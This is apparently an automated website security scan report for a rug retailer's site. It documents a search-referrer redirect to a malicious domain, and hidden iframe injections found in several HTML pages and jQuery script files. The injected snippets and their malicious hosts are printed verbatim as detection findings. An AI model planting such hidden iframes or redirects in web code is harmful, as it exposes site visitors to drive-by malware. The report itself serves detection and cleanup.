Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://starrorientalrugs.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: starrorientalrugs.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 19 Sep 2014 11:34:25 GMT Location: http://hecodat.de/zwmd.html?h=2031784 Server: Apache Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://starrorientalrugs.com/ | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4300 bytes skipped]... </div><!--END OF NAVY AND CONTENT--> </div><!--END OF CONTENT WRAPPER--> <div class="footercopy" id="footer">© 2011 Starr Oriental Rugs</div> <!--Slides--><div id="supersized"></div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 78x32 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113> | ||
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js | 200 OK Content-Length: 77746 Content-Type: text/javascript | clean |
http://starrorientalrugs.com/js/effects.core.js | 200 OK Content-Length: 19324 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784></iframe>');
;(function($) { $.effects = $.effects || {}; $.extend($.effects, { save: function(el, set) { for(var i=0;i<set.length;i++) { if(set[i] !== null) $.data(el[0], "ec.storage."+set[i], el[0].style[set[i]]); } }, restore: function(el, set) { for(var i=0;i<set.length;i++) { return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=2031784 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784> | ||
http://starrorientalrugs.com/js/effects.slide.js | 200 OK Content-Length: 1748 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784></iframe>');
(function($) { $.effects.slide = function(o) { return this.queue(function() { var el = $(this), props = ['position','top','left']; var mode = $.effects.setMode(el, o.options.mode || 'show'); var direction = o.options.direction || 'left'; $.effects.save(el, props); el.show(); $. var animation = {}; animation[ref] = (mode == 'show' ? (motion == 'pos' ? '+=' : '-=') : (motion == 'pos' ? '-=' : '+=')) + distance; el.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() { if(mode == 'hide') el.hide(); $.effects.restore(el, props); $.effects.removeWrapper(el); if(o.callback) o.callback.apply(this, arguments); el.dequeue(); }}); }); }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=2031784 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784> | ||
http://starrorientalrugs.com/supersized.3.0.js | 200 OK Content-Length: 14684 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784></iframe>');
(function($){ $.fn.supersized = function() { $.inAnimation = false; $.paused = false; var options = $.extend($.fn.supersized.defaults, $.fn.supersized.options); $.currentSlide = options.start_slide - 1; var imageLink = (options.slides[options.slides.le } $('#supersized').resizenow(); } $.fn.supersized.defaults = { startwidth: 4, startheight: 3, vertical_center: 1, slideshow: 1, navigation:1, thumbnail_navigation: 0, transition: 1, pause_hover: 0, slide_counter: 1, slide_captions: 1, slide_interval: 5000, start_slide: 1 }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=2031784 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784> | ||
http://starrorientalrugs.com/Decorative.html | 200 OK Content-Length: 9442 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4458 bytes skipped]... ; <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=4 width=82 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 82x4 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=4 width=82 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/index.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4300 bytes skipped]... </div><!--END OF NAVY AND CONTENT--> </div><!--END OF CONTENT WRAPPER--> <div class="footercopy" id="footer">© 2011 Starr Oriental Rugs</div> <!--Slides--><div id="supersized"></div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 78x32 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Tibetans.html | 200 OK Content-Length: 12510 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4445 bytes skipped]... ;/td> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=43 width=95 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 95x43 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=43 width=95 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Antique.html | 200 OK Content-Length: 7696 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4456 bytes skipped]... <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=70 width=61 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 61x70 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=70 width=61 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Custom.html | 200 OK Content-Length: 7545 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4424 bytes skipped]... > </td> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div><!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=4 width=87 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 87x4 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=4 width=87 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/AboutUs.html | 200 OK Content-Length: 7375 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4477 bytes skipped]... ;nbsp;</td> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div><!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=28 width=82 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 82x28 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=28 width=82 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Contact.html | 200 OK Content-Length: 8606 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4574 bytes skipped]... d> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=46 width=98 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 98x46 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=46 width=98 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/test404page.js | 404 Not Found Content-Length: 2673 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://starrorientalrugs.com/Decorative Aubussons.html | 200 OK Content-Length: 24150 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=starrorientalrugs.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://starrorientalrugs.com/
Result: starrorientalrugs.com is not infected or malware details are not published yet.
Result: starrorientalrugs.com is not infected or malware details are not published yet.